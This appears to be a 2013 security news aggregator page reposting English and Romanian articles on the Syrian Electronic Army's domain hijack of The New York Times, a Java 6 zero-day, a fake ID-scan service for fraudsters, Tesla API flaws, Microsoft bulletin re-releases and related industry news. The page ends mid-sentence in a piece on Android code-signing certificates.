Matt

The Syrian Electronic Army (SEA) targeted several prominent media agencies and websites, including The New York Times and Twitter in its latest cyber rampage. News of the attack broke after The New York Times website went offline and head of the Threat Research Center at WhiteHat Security, Matt Johansen, posted on Twitter that users were being redirected to an SEA site. The New York Times reported that employees have also received an email from the newspaper's chief information officer Marc Frons, advising them to "be careful when sending email communications until this situation is resolved". Frons explained that the hackers targeted the registrar used by the NYT, called Melbourne IT, which caused the site to drop offline. He called the incident a "malicious external attack" and showed the attacks had some serious capabilities. “In terms of the sophistication of the attack, this is a big deal,” he said. “It’s sort of like breaking into the local savings and loan versus breaking into Fort Knox. A domain registrar should have extremely tight security because they are holding the security to hundreds if not thousands of websites.” Indeed, director at AlienVault labs, Jaime Blasco said research showed the new attack had features indicating a secondary purpose to steal passwords from unwary web users trying to access the news site. "Hackers who successfully break into Melbourne IT's systems could potentially redirect and intercept emails sent to addresses under certain domains. Users of sites that don't begin with ‘https' could have been fooled into entering passwords that could have been captured," he wrote. The New York Times was one of many sites hit by the SEA. Alienvault has since published a full list of all the sites targeted during the SEA's latest raid, with other key victims including Twitter and Huffington Post. The attacks are the latest in a wider campaign against the Western media by the SEA. The group first appeared in May 2011 targeting any website or media outlet publishing material criticising Syrian president, Bashar al-Assad. As such senior security strategist at Imperva Barry Shteiman, said the group's high success rate targeting media outlets is poignant proof that most companies are still running using outdated security services. "At some point, CIOs need to realise that critical pieces of their online entities are controlled by vendors, and that security policies should apply to them as well. Companies should create contingency plans, and check the security measurements taken by their third-party content and infrastructure providers. A DNS is, unfortunately, a great example," he said. He added that the high success rate of the attacks means groups like the SEA will continue to operate and become more tenacious. "It makes lots of sense for a hacktivist group – that wishes to display their message and show that they exist – to go after high-end media," he said. "The SEA has been actively hacking Twitter accounts of news sites and have recently escalated to hacking into the websites themselves to create awareness. This is, in essence, what hacktivism is. There is no profit involved, however making all of us aware of the Syrian rebellion is their goal. The Syrian Electronic Army is very successful in creating the awareness that they are after." The SEA is one of many hacktivist groups currently operating. Prior to the recent campaign, security firm Mandiant reported linking a Chinese hacktivist military cell to attacks on The New York Times. The attacks were reportedly "payback" for a series of articles the paper published about Chinese prime minister Wen Jiabao. Source V3.CO.UK

HP has unveiled a new Fortify Static Code Analyzer 4.0, claiming the tool will improve companies' software security assessment speeds tenfold. HP said the new Fortify Static Code Analyzer improves on previous versions by using more accurate and parallelised static application security testing procedures and will offer a variety of cyber security improvements. These include the ability to create better software security intelligence reports and a 20 percent reduction in false positive results compared with previous versions. The new reports will include key information offering IT administrators risk-ranked lists of issues for mobile, web, client and server applications, making it easier for them to spot serious vulnerabilities before they are exploited. The new Fortify Static Code Analyzer can also reduce application development times, says HP, allowing full application scanning that runs in tangent with the app-development process. The service also features flexible deployment options with HP offering on-premise or on-demand access. The news follows widespread warnings from within the security community that the threats facing companies is increasing. Most recently McAfee reported seeing a marked spike in the number of ransomware and mobile banking attacks active in the wild in its Second Quarter Threat Report. HP vice president and general manager of Enterprise Security Products Mike Armistead, said businesses need analytics tools such as Fortify Static Code Analyzer 4.0 to deal with the new threats. "Software security vulnerabilities are becoming more prevalent as the demand to support new technology needs escalates," he said. "A holistic approach to software security is imperative, and with the HP Fortify portfolio, organisations have the ability to assess vulnerabilities across all of their software, assure security flaws are resolved before deployment, and protect applications from attacks once in production." Source V3.CO.UK

Microsoft has more than tripled the available storage on its SkyDrive Pro storage product for Office 365 business subscribers as it hits back at rivals such as Box in the storage market. In a notable boost to the offering, users are now given 25GB of storage, up from the 7GB previously offered, while administrators can boost storage to 50GB or 100GB for users whenever necessary. The firm has also added new functions to make it easier for users to find documents that have been shared with them by colleagues. Writing on a blog, senior product managers for the SharePoint marketing team, Mark Kashman and Tejas Mehta, said that upping the storage would ensure businesses could meet their storage needs from the start. "If you and your company have growing storage needs across your various work streams and content types, we think you'll find Office 365 offers ample headroom on day one, at no additional cost," they wrote. "SharePoint Online admins can now increase SkyDrive Pro storage space for those individuals that need and want more than the default 25GB of storage. You can select increases in increments, up to 50GB or 100GB, and you can adjust the storage for up to 25 users at once." Purchasing new storage is done through the Storage Metrics page on the Site Settings control panel, with each gigabyte costing $0.20 a month, Microsoft explained. The move comes just a week or so after dedicated cloud storage firm Box boosted its free offering from 5GB to 10GB, taking it past Microsoft’s previous 7GB offering. In another boost to its service, Microsoft has also added a new Shared with Me view within the control panel so users can just see the documents that have been shared more easily, as Kashman and Mehta explained. “Have you ever experienced the pain of trying to locate a document or folder a colleague previously shared with you? Shared with Me eliminates the worry of finding those important items, because now they're all visible in a single view from within your SkyDrive Pro," they wrote. The move from Microsoft underlines the growing battle for the cloud storage market as enterprises embrace the benefits that allowing employees to store and access data from any location allows. Source V3.CO.UK

The US hacker caught after trying to sell Department of Energy supercomputer logins to an undercover FBI agent has pleaded guilty in a deal that could see him go to jail for up to 18 months. The 24-year-old hacker, Pennsylvania man Andrew James Miller, pleaded guilty to charges of conspiracy and computer fraud to cut his potential sentence down from 15 years in prison. According to court filings, Miller said he had accessed a number of corporate and government systems, including ones at American Express and Google, by hacking employee computers and stealing their logins. He started out peddling lists of usernames and passwords to the undercover agent for payments of between $500 and $1,000 and then tried to get $50,000 for access to a supercomputer at the DoE's National Energy Research Scientific Computing Centre, according to court transcripts. Miller, whose handle was "Green", was part of the hacker group Underground Intelligence Agency (UIA). According to the unsealed indictment, he was set up with the undercover Fed after the FBI turned fellow member Robert "Intel" Burns into a witness in 2010. Following his jail time, Miller will be on supervised release for three years and is also required to pay a fine and restitution to victims, which has yet to be calculated by the court. His sentencing is scheduled for 19 November. ® Source TheRegister.co.uk

Evolutie..

Description : This bulletin summary lists four re-released Microsoft security bulletins for August, 2013. Author : microsoft.com Source : Microsoft Security Bulletin Re-Release For August, 2013 ? Packet Storm Code : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ******************************************************************** Title: Microsoft Security Bulletin Re-Releases Issued: August 27, 2013 ******************************************************************** Summary ======= The following bulletins have undergone a major revision increment. Please see the appropriate bulletin for more details. * MS13-057 - Critical * MS13-061 - Critical * MS13-jul * MS13-aug Bulletin Information: ===================== MS13-057 - Critical - https://technet.microsoft.com/security/bulletin/MS13-057 - Reason for Revision: V3.0 (August 27, 2013): Bulletin revised to rerelease security update 2803821 for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; security update 2834902 for Windows XP and Windows Server 2003; security update 2834903 for Windows XP; security update 2834904 for Windows XP and Windows Server 2003; and security update 2834905 for Windows XP. Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 customers should install the rereleased updates. See the Update FAQ for more information. - Originally posted: July 9, 2013 - Updated: August 27, 2013 - Bulletin Severity Rating: Critical - Version: 3.0 MS13-061 - Critical - https://technet.microsoft.com/security/bulletin/MS13-061 - Reason for Revision: V3.0 (August 27, 2013): Rereleased bulletin to announce the reoffering of the 2874216 update for Microsoft Exchange Server 2013 Cumulative Update 1 and Microsoft Exchange Server 2013 Cumulative Update 2. See the Update FAQ for details. - Originally posted: August 13, 2013 - Updated: August 27, 2013 - Bulletin Severity Rating: Critical - Version: 3.0 * MS13-jul - https://technet.microsoft.com/security/bulletin/ms13-jul - Reason for Revision: V3.0 (August 27, 2013): For MS13-057, bulletin revised to rerelease security update 2803821 for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; security update 2834902 for Windows XP and Windows Server 2003; security update 2834903 for Windows XP; security update 2834904 for Windows XP and Windows Server 2003; and security update 2834905 for Windows XP. Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 customers should install the rereleased updates that apply to their systems. See the bulletin for details. - Originally posted: July 9, 2013 - Updated: August 27, 2013 - Version: 3.0 * MS13-aug - https://technet.microsoft.com/security/bulletin/ms13-aug - Reason for Revision: V3.0 (August 27, 2013): For MS13-061, bulletin revised to announce the reoffering of the 2874216 update for Microsoft Exchange Server 2013 Cumulative Update 1 and Microsoft Exchange Server 2013 Cumulative Update 2. See the bulletin for details - Originally posted: August 13, 2013 - Updated: August 27, 2013 - Version: 3.0 Other Information ================= Follow us on Twitter for the latest information and updates: http://twitter.com/msftsecresponse Recognize and avoid fraudulent email to Microsoft customers: ============================================================= If you receive an email message that claims to be distributing a Microsoft security update, it is a hoax that may contain malware or pointers to malicious websites. Microsoft does not distribute security updates via email. The Microsoft Security Response Center (MSRC) uses PGP to digitally sign all security notifications. However, it is not required to read security notifications, security bulletins, security advisories, or install security updates. You can obtain the MSRC public PGP key at https://technet.microsoft.com/security/bulletin/pgp. To receive automatic notifications whenever Microsoft Security Bulletins and Microsoft Security Advisories are issued or revised, subscribe to Microsoft Technical Security Notifications on http://technet.microsoft.com/security/dd252948. ******************************************************************** THE INFORMATION PROVIDED IN THIS MICROSOFT COMMUNICATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. ******************************************************************** To manage or cancel your subscription to this newsletter, visit the Microsoft.com Profile Center at <http://go.microsoft.com/fwlink/?LinkId=245953> and then click Manage Communications under My Subscriptions in the Quicklinks section. For more information, see the Communications Preferences section of the Microsoft Online Privacy Statement at: <http://go.microsoft.com/fwlink/?LinkId=92781>. For the complete Microsoft Online Privacy Statement, see: <http://go.microsoft.com/fwlink/?LinkId=81184>. For legal Information, see: <http://www.microsoft.com/info/legalinfo/default.mspx>. This newsletter was sent by: Microsoft Corporation 1 Microsoft Way Redmond, Washington, USA 98052 -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsFVAwUBUhvZ1hWqSyu+jsPhAQgOlhAA1LEh6v8Ig26xht2EgSo2R4tx4Pb5+584 DV4OLR6JXnYIPM/VwmnaNJ6Bftt7MnwD3fpYDq1HmyZZqnwuzp0ocIKczUTQ9sOC uig6YXoTOAahTfGNQi/dDX0toy5ydME8MWf/KIiKmZ7ziUTpNlNYF4QC5riHMCRb PGwoR1PkwVrJA6p9DYGmMAP+VISCyu6U5Z6JXNIF3PM5Iz33xMQqgEcqZqXDTRoG bxi4XUfhLtDB/P/toqawHr+bZp895u1ZMpL/nlPiB39RKmAE5eM3CqTxD05UgiAx wOIn7hvJ6IA77iXW4vgxd3PIJzAqx5v7s98PWWtTYbPvsr3n9A19fnV9uLJxQJmm vwLV1SzkVHuq9CD4E5QqVuhNRnV48l7ieQI/S2bYpdORbm0wuKmPWvp2ZW5DDhuy GTRQdGJgpq4dRM18xJqFwKokSwx4Sz+EfHKdfm5tm+qB19p1DcSGeKxeI2Gtd8BP 6vEQKwbM+sifwloVa2YWpW29vxVTbyYEPjGjxQ6Guch+dI7n2a+D6j9eY8GKQAOA 3RBSSTeLlm5zFuU0AiaXphnMG38EF7i6Cp3HO0Kd+qtRzHm+RctnxmZlWl6bMzsA PvQqigj/I0g1X8JivzNe/O7NHpNMQwEgCoHppomXi1S2gy+DwSrIoJ/8kzowIUPK j1nMKU2vXfc= =xrTY -----END PGP SIGNATURE-----

SECURITY RESEARCHERS are urging users of Oracle's Java 6 software to upgrade to Java 7 as soon as possible to avoid becoming the victims of active cyber attacks. F-secure senior analyst Timo Hirvonen warned about the exploit this weekend over Twitter, advising that he had found an exploit in the wild actively targeting an unpatched vulnerability in Java 6, named CVE-2013-2463. CVE-2013-2463 was addressed by Oracle in the June 2013 Critical Patch Update for Java 7. Java 6 has the same vulnerability, as Oracle acknowledged in the update, but since Java 6 became unsupported in April 2013, there is no patch for the Java 6 vulnerability. Cloud security provider Qualys described the bug as an "implicit zero-day vulnerability". The firm's CTO Wolfgang Kandek said he had seen it included in the spreading Neutrino exploit kit threat, which "guarantees that it will find widespread adoption". "We know about its existence, but do not have a patch at hand," Kandek said in a blog post. "This happens each time a software package loses support and we track these instances in Qualysguard with our 'EOL/Obsolete' detections, in this case. "In addition, we still see very high rates of Java 6 installed, a bit over 50 percent, which means many organisations are vulnerable." Like F-secure, Kandek recommended that any users with Java 6 upgrade to Java 7 as soon as they can. "Without doubt, organisations should update to Java 7 where possible, meaning that IT administrators need to verify with their vendors if an upgrade path exists," he added. µ Source TheInquirer.Net

Potrivit estimarilor The PhoneGeeks, echipa tehnica de telefonie mobila a EuroGsm, 85% dintre utilizatorii locali de smartphone-uri nu utilizeaza aplicatii mobile pentru securitatea acestor dispozitive. Printre cele mai mari riscuri specifice se numara accesarea neautorizata de date confidentiale si furtul informatiilor, dificultatea in localizarea dispozitivului prin GPS si imposibilitatea blocarii terminalului de la distanta, in cazul pierderii sau furtului. „Cei mai multi dintre utilizatori nu vad dispozitivul ca pe o tinta a unor atacuri informatice si, in consecinta, nici nu utilizeaza aplicatii mobile de securitate. Cel mai mare risc este furtul de informatii de pe telefon, cum ar fi parolele de acces la email, agenda de telefon sau alte date care pot duce la prejudicii importante”, a explicat Adi Coman – The PhoneGeeks. Cele mai indicate aplicatii mobile de securitate sunt programele antivirus, care asigura protectie impotriva accesarii datelor confidentiale si furtului de informatii, insa exista si aplicatii care permit blocarea dispozitivului in cazul pierderii sau furtului, localizarea prin GPS a telefonului si notificarea utilizatorului prin SMS cu coordonatele acestuia. Antivirusi si aplicatii de localizare pentru Android si iOS Potrivit recomandarilor The PhoneGeeks, cele mai indicate aplicatii antivirus pentru dispozitivele Android sunt Bitdefender Mobile Security, Avast Mobile Security, AVG Antivirus sau Lookout Security and Antivirus. „Aplicatiile recomandate sunt gratuite, consuma resurse putine, ceea ce face ca dispozitivul mobil sa functioneze in conditii optime, iar interfata grafica este usor de folosit. Softurile gratuite si cele platite se comporta relativ la fel in securizarea telefonului, diferentele fiind date de optiunile suplimentare incluse in aplicatiile contra cost, pretul acestora variind intre 4 si 15 euro”, a precizat Radu Boanca – The PhoneGeeks. Pentru dispozitivele iOS, consultantul EuroGsm recomanda antivirusi precum McAfee Global Threat Intelligence Mobile, iSafeGuard, Lookout sau VirusBarrier. Printre cele mai utilizate programe pe plan local pentru localizarea smartphone-urilor prin GPS, se numara Find my iPhone (pentru iOS) si respectiv Find my Phone (pentru Android), o aplicatie similara fiind si Wheres My Droid. Sfaturi pentru cresterea securitatii dispozitivelor mobile Pentru cresterea securitatii dispozitivelor mobile, The PhoneGeeks recomanda setarea unor coduri de acces, precum si descarcarea aplicatiilor de securitate doar din magazinele virtuale Google Play, AppStore sau Windows Phone. „Este indicat sa nu se instaleze aplicatii din surse necunoscute si sa fie atenti cand anumite aplicatii instalate cer accesarea de informatii personale”, a completat Marius Boca de la The PhoneGeeks. Despre EuroGsm EuroGsm este cel mai mare retailer autohton in domeniul telecom, cu o retea de magazine extinsa la 80 de orase si 112 unitati in cei 16 ani de existenta. Compania aduce pe piata cele mai noi tendinte in domeniul comunicarii mobile, prin diversificarea portofoliului de produse si servicii, si ofera solutii de comunicare inovatoare, telefoane de ultima generatie, accesorii si o gama variata de servicii, precum plata facturilor, abonamente de voce sau date. EuroGsm este ghidul pe care ti-l doresti alaturi cand pornesti in explorarea tehnologiei. Sursa: totalPR relatii publice / Agentie de relatii publice | totalPR

Bitdefender, liderul pie?ei române?ti de solu?ii antivirus, anun?? lansarea noii versiuni a aplica?iei de securitate pentru dispozitive cu Android Bitdefender Mobile Security, ce ofer? protec?ie împotriva viru?ilor ?i o informare constant? cu privire la eventualele scurgeri de date personale. Software-ul, ce a ob?inut punctaje maxime în testele independente de securitate, include acum Privacy Advisor, o func?ie ce permite utilizatorilor s? monitorizeze aplica?iile suspecte care pot pune în pericol confiden?ialitatea datelor personale, sunt neglijente cu informa?ii sensibile sau livreaz? spam. “Amenin??rile pentru dispozitive cu Android sunt din ce în ce mai frecvente ?i mai variate. Viru?ii tradi?ionali r?mân un pericol permanent, iar noile amenin??ri decurg mai ales din aplica?iile pe care utilizatorii pe instaleaz? pe telefoane. Am echipat Bitdefender Mobile Security pentru a proteja dispozitivele de toate aceste pericole ?i de cele noi, care apar în fiecare zi”, a spus C?t?lin Co?oi, Chief Security Strategist, Bitdefender. Privacy Advisor suplimenteaz? celelalte func?ii ale Bitdefender Mobile Security, inclusiv scanarea la cerere, blocarea dispozitivului de la distan??, minimizarea impactului asupra bateriei ?i cea mai performant? tehnologie antivirus. Luna trecut? Bitdefender Mobile Security a ob?inut punctaj maxim pentru a doua oar? consecutiv în test?rile realizate de compania independent? de evaluare AV-TEST. Solu?ia a ob?inut 6 puncte din 6 atât la capitolul protec?ie cât ?i la cel al u?urin?ei în utilizare, reiterând performan?a unui scor perfect realizat? în sesiunile din mai/iunie. Bitdefender Mobile Security a detectat 100% din viru?ii cu care a fost testat pe parcursul lunii ?i nu a emis nicio alarm? fals?. Testul a ar?tat, de asemenea, c? Bitdefender Mobile Security nu are impact asupra duratei de via?? a bateriei, nu încetine?te func?ionarea în condi?iile unei utiliz?ri normale ?i nu genereaz? trafic de internet în exces. Aplica?ia este dispobilil? în Google Play: https://play.google.com/store/apps/details?id=com.bitdefender.security&feature Mai multe detalii despre testele de realizate de AV-Test: AV-TEST - The Independent IT-Security Institute: Jul 2013 AV-TEST - The Independent IT-Security Institute: May 2013 Source FaraVirusi.Com

A new Web-based service for cybercriminals automates the creation of fake scanned documents that can help fraudsters bypass the identity verification processes used by some banks, e-commerce businesses and other online services providers, according to researchers from Russian cybercrime investigations firm Group-IB. The service can generate scanned copies of passports, ID cards and driver's licenses from different countries for identities supplied by the service users, fake scanned utility bills from various companies, as well as fake scanned copies of banking statements and credit cards issued by a large number of banks, said Andrey Komarov, head of international projects at Group-IB, via email. It is common practice for banks, payment and money transfer providers, online gambling sites and other types of businesses that engage in money transactions via the Internet to ask their customers for scanned copies of documents in order to prove their identities or verify their physical addresses, especially when their anti-fraud departments detect suspicious account activity. Using image manipulation software to change the photo, name and other details on a scanned ID is obviously not a new practice, but services like the one identified by Group-IB that automate the whole process and produce high-quality results are new on the cybercriminal market, Komarov said. According to Group-IB, the service is provided through a website hosted on a server in Germany. The domain name was registered in May, but the service was launched in mid-August, Komarov said. Independent cybercrime researcher Dancho Danchev described a similar service in a July blog post, however, Komarov could not confirm whether it is the same one because there was no reference to the service's domain name in Danchev's report. The service found by Group-IB has templates for passports, ID cards and driver's licences for the U.S., Canada, Russia, the U.K., Germany, the Netherlands and other European Union countries. It also has templates for bank statements, credit cards -- front and back -- and utility bills from banks and utility companies operating in those countries. The templates are for documents and cards that show signs of use and are scanned at different angles and different positions on the canvas. This makes the resulting image appear more authentic. Using the service, a cybercriminal can get a counterfeit scanned document in JPG or PNG image format in around 40 seconds, Komarov said. Scans of U.S. passports are the most expensive product and cost $11 each. Other scanned documents are priced at $7.99 or $9.99 each. Cybercriminals can pay using several online payment services and virtual currencies including WebMoney, Perfect Money, Bitcoin, Paymer and a new payment service called papogo.com that caters to the black market, Komarov said. Some companies that use scanned documents for identity verification have specialized systems and tools that can detect image modifications, Kamarov said. When there is suspicion about the authenticity of a scan, the anti-fraud teams will request images with better quality to verify that they are really created by the user, he said. However, sometimes companies don't have the resources to perform detailed checks of incoming scans and criminals are exploiting this, Komarov said. Source ComputerWorld.Com

A Pennsylvania man who was allegedly a member of the computer hacking group the Underground Intelligence Agency has pleaded guilty to one count of conspiracy and two counts of computer intrusion, the U.S. Department of Justice announced. Andrew James Miller, 23, of Devon, Pennsylvania, pleaded guilty Tuesday in the U.S. District Court for the District of Massachusetts. He and other hackers conspired to install backdoors into computer networks and sell root access to those networks, according to court documents. Between 2008 and 2010, Miller gained access to the computer networks of a Massachusetts telecommunications provider's network, a Colorado advertising agency and the U.S. Department of Energy, according to court documents. He then offered, in online chats, to sell log-in credentials to those networks for up to US$1,000, according to the indictment filed in the Massachusetts court. Miller is scheduled to be sentenced on Nov. 19.A The maximum penalty for the conspiracy count is five years in prison.A One of the computer intrusion counts carries a maximum penalty of five years in prison and the other, involving intentional damage to a private computer, carries a maximum penalty of 10 years in prison. Grant Gross covers technology and telecom policy in the U.S. government for The IDG News Service. Follow Grant on Twitter at GrantGross. Grant's e-mail address is grant_gross@idg.com. Source ComputerWorld.Com

Slack authentication in Tesla's Model S REST API exposes the electric car to a variety of non-safety but non-trivial attacks, according to a Dell engineer and Tesla owner. In this post over at O'Reilly, Dell senior distinguished engineer and executive director of cloud computing George Reese says the “flawed” authentication protocol in the Tesla REST API “makes no sense”. Rather than using OAuth, Tesla has decided to craft its own authentication, which Reese unpicked. There's one small reassurance for owners of the 'leccy car: none of the vulnerabilities he discusses cause any kind of safety issue – although he creepily notes that an attacker would be able to see everywhere the car goes. Tesla, it turns out, has broken one of the golden rules of security – the one that says “don't re-use user IDs and passwords for different functions”. In this case, the e-mail and password used to build the car at the Tesla Website are retained later for customers logging into the car via the Website. There's also a persistence issue: when a user logs into the Tesla Website to get to their car, it creates a three-month token for which there's no revocation mechanism. If the system is compromised, the attacker would have access to the login for three months, and if “an attacker gains access to a website’s database of authenticated tokens,” then all the cars would be visible to the attacker. While the flaw doesn't offer access to any “operational” aspects of the car – like steering or brakes – the risks are still significant. An attacker could fool around with configuration settings, the climate control, the sunroof, open the charge port, and anything else supported by the API. Apart from tracking owners' movements, “there is enough here to do some economic damage both in terms of excess electrical usage and forcing excess wear on the batteries”, Reese notes. Reese links to an unofficial documentation of the API, which outlines its capabilities, here. ® Source TheRegister.Co.Uk

Cracker collective the Syrian Electronic Army – or someone using its name – has claimed responsibility for domain-hijacking Twitter.co.uk, nytimes.com and huffingtonpost.co.uk. At the time of writing, many of the domains the SEA claimed to have hijacked were back under their owners' control. In some cases, only the contact records for domains were altered. However, nytimes.com currently returns the SEA as its nameserver. The New York Times has attributed an outage last Tuesday to malicious activity, and while it didn't nominate the SEA, its workaround made it clear that a domain redirect was the problem, since it pointed readers at its IP address to get to its site. So far, the SEA's threat against the Huffington Post doesn't seem to have eventuated Twitter users are attributing the problems to registrar MelbourneIT, which is common to many of the hijacked domains. HD Moore of Metasploit Framework fame has told Mashable that “if the attackers have found a weakness in the MelbourneIT system”, then other domains would also be at risk. The New York Times also attributes the attack to MelbourneIT: “The New York Times Web site was unavailable to readers on Tuesday afternoon following an attack on the company’s domain name registrar, Melbourne IT. The attack also required employees of The Times to stop sending out sensitive e-mails”, it has told employees. The Register has tried to contact MelbourneIT, so far without success. ® Update: While MelbourneIT has yet to return calls from Vulture South, it has apparently told Business Insider a reseller was responsible for the hijacked domains. Its statement is below. The credentials of a Melbourne IT reseller (username and password) were used to access a reseller account on Melbourne IT’s systems. The DNS records of several domain names on that reseller account were changed – including nytimes.com. Once Melbourne IT was notified, we: - changed the affected DNS records back to their previous values - locked the affected records from any further changes at the .com domain name registry - changed the reseller credentials so no further changes can be made - We are currently reviewing our logs to see if we can obtain information on the identity of the party that has used the reseller credentials, and we will share this information with the reseller and any relevant law enforcement bodies. We will also review additional layers of security that we can add to our reseller accounts. For mission critical names we recommend that domain name owners take advantage of additional registry lock features available from domain name registries including .com – some of the domain names targeted on the reseller account had these lock features active and were thus not affected. Source TheRegister.Co.Uk

Intel has released the Intel C++ Compiler v13.0 for Android OS, its first attempt at delivering an optimizing C/C++ compiler designed specifically for Google's mobile platform. The release is notable for a number of reasons. First, the overwhelming majority of Android devices are currently built around chips based on the ARM architecture. Intel's compilers can only output code for its own chips, including its Atom line of mobile processors. Second, the majority of Android app development is done not in C++ but in Java. Specifically, developers use Oracle's Java SDK to compile their code and then run it through a further tool that converts it into Android's unique Dalvik binary format, which can be executed by virtual machines running on a variety of chips. Still other developers build Android apps using HTML5 and related technologies, which typically don't require a compiler at all. Intel says it's not trying to lure developers away from any of these methods. Instead, its new C++ Compiler for Android is designed for apps that take advantage of the Android Native Development Kit (NDK), which is typically used to develop components for performance-intensive apps, such as games. The current version of the Android NDK uses version 4.6 of the open source Gnu Compiler Collection (GCC) toolchain by default. But Intel's compilers include lots of proprietary optimizations for its own chips, and can often output executable code that performs better than that produced by third-party compilers such as GCC. According to Intel's FAQ, its C++ Compiler for Android provides drop-in source code compatibility with Gnu C++, but it outputs more efficient code that executes faster and helps keep devices cool and power consumption low. The new compiler can't be used to generate code that runs on Windows, OS X, desktop Linux, or any other operating system. It can only produce code for Android – and specifically, Android version 4.0 and up (releases codenamed "Ice Cream Sandwich" and "Jelly Bean"). You can't use the compiler on just any development machine, either. Neither Windows nor OS X is supported; the tools are only certified for use with Ubuntu 10.04 or 11.04 (the latter version being nearly two and a half years old). Versions for other platforms may be forthcoming – Intel says "stay tuned." In an unusual move, Intel is making this first version of its Android compiler available as a free download for a limited time. By comparison, Intel C++ Composer XE 2013, Chipzilla's C++ tools collection for desktop operating systems, retails for $699 (£450) for Windows, Linux, or OS X. The company isn't saying how long the tools will be available for no charge, or what will happen after that. To get the compiler, head on over to Intel's registraiton site where you will be asked to submit your email address to receive a personalized download link. ® Source TheRegister.co.uk

The rise of mobile banking technologies poses major risks to consumers around issues of fraud, theft and input errors caused by small keypads, according to a government financial watchdog. The Financial Conduct Authority (FCA) has published a report on the issues around mobile banking in which it noted that while the technology has clear benefits for consumers, banks and telecoms companies have a responsibility to ensure consumers are protected. For example, it cited malware and viruses hidden with applications offered by banks as a serious threat that must be tackled. "Malware is an important risk for firms to consider, as it can result in financial loss and undermine consumer confidence in mobile banking," the report said. The IT running mobile systems must be robust enough to meet customer needs, or firms risk serious issues, the report noted. "There is a risk that an IT failure could interrupt services, preventing access to mobile banking, limiting customers’ access to their money and undermining consumer confidence in these services," it said. "The potential impact of this may grow as consumers increasingly rely on mobile banking. We recognise that firms may be under strong commercial pressure to develop and launch products quickly, which could risk services being released without sufficient testing and protection." Even the keypads offered on smartphones were cited as a potential cause for issues, as customers could enter the wrong information. "Mobile phones, with their smaller screens and limited keypad, may make errors more likely, therefore it is important for us to understand how firms are mitigating this risk," it said. Clive Adamson, director of supervision at the FCA, said the preliminary report from the organisation, which is the precursor to a longer, more detailed report to be launched in 2014, was a vital piece of work to ensure this burgeoning technology was properly supervised. "Mobile banking is an exciting development in financial services. With the market growing, now is the right time for us to take stock and, as part of the FCA's forward-looking approach, to ensure that consumers are appropriately protected,” he said. "By publishing these initial thoughts we want to make sure that the industry knows exactly what we’re looking into, and consumers have a clearer idea of some of the potential risks." The report comes as mobile financial transactions rocket in use, with major payment firms such as Visa, MasterCard and Barclays all innovating in this space. Visa has predicted that 52 million contactless payments will be made every month across Europe by the end of 2013 as it declares ‘war on cash’. Meanwhile Barclays has said that £10bn has been sent via its mobile services, such as Pingit, since their introduction. IT glitches are already a cause of serious headaches for banks, with RBS facing a £125m charge for issues in June 2012, which halted overnight payments between accounts. Source V3.CO.UK

UK authorities requested data on 2,337 Facebook users from the firm in the first six months of 2013, as the social network reveals data on the government data requests it receives for the first time. In total, 1,975 requests were made, meaning some submissions concerned more than one user at a time. In total 68 percent of these requests for data were granted by Facebook. Only the US, with between 10,000 and 11,000 requests for data on between 20,000 and 21,000 users, and India, with 3,245 requests for data on 4,144 members of the site, filed more submissions to Facebook than the UK. Facebook was required by law to produce data for 79 percent of the requests from the US and 50 percent from India. Hong Kong and Iceland had 100 percent of requests granted, but this was from just one submission each. Colin Stretch, Facebook’s general counsel, said the firm was releasing the information in order to prove that while it complied with the laws when required, it did not hand over data to the government whenever asked. This comes after the PRISM revelations leaked by Edward Snowden, which suggested the UK and US authorities had unchecked access to the data held by tech giants such as Facebook. “As we have made clear in recent weeks, we have stringent processes in place to handle all government data requests. We scrutinise each request for legal sufficiency under our terms and the strict letter of the law, and require a detailed description of the legal and factual bases for each request," he said. "We fight many of these requests, pushing back when we find legal deficiencies and narrowing the scope of overly broad or vague requests. When we are required to comply with a particular request, we frequently share only basic user information, such as name." Stretch added that the government should not be entitled to data on web users without accountability and that by publishing such data it would allow others to keep track of its data demands. “As we have said many times, we believe that while governments have an important responsibility to keep people safe, it is possible to do so while also being transparent. Government transparency and public safety are not mutually exclusive ideals,” he said. “Each can exist simultaneously in free and open societies, and they help make us stronger. We strongly encourage all governments to provide greater transparency about their efforts aimed at keeping the public safe, and we will continue to be aggressive advocates for greater disclosure.” Facebook joins others sites such as Google and Twitter in releasing information on the data it is asked for by governments, which show the importance governments around the world place on data posted on social sites. Source V3.CO.UK

You have to admire Google sometimes. Sometimes they do the right thing. Sometimes. Consider the company's recent decision to tighten up internal requirements for SSL/TLS certificates to conform with the Baseline Requirements of the CA/Browser Forum. SSL/TLS certificates are a crucial tool for making the Internet trustworthy. The problem which led to this decision was the discovery that an unnamed certificate authority (OK, it's GoDaddy) was issuing certificates with a lifespan in excess of the maximum 60 months allowed by the Baseline Requirements. Why should certificates have a maximum life span? Excessive life spans allow certificates with policies which should have expired long time ago to continue functioning. Cryptographic methods have a shelf life. After a time, security research and Moore's Law have a way of finding vulnerability in algorithms which were precious unbreakable. Perhaps the biggest such problem we have these days is the MD5 hash algorithm, although there are many ciphers as well which have lost trustworthiness over time. This is why it's good that certificates have relatively brief lives, so that they can be assured access to the latest security tech. So if these are valid concerns for SSL/TLS, why does Google laugh them off for Android code signing? Google's policies for code signing of Android apps for distribution in the Google Play store mandates that the certificates for the signatures have very, very long validity periods: If you plan to publish your application(s) on Google Play, the key you use to sign the application(s) must have a validity period ending after 22 October 2033. Google Play enforces this requirement to ensure that users can 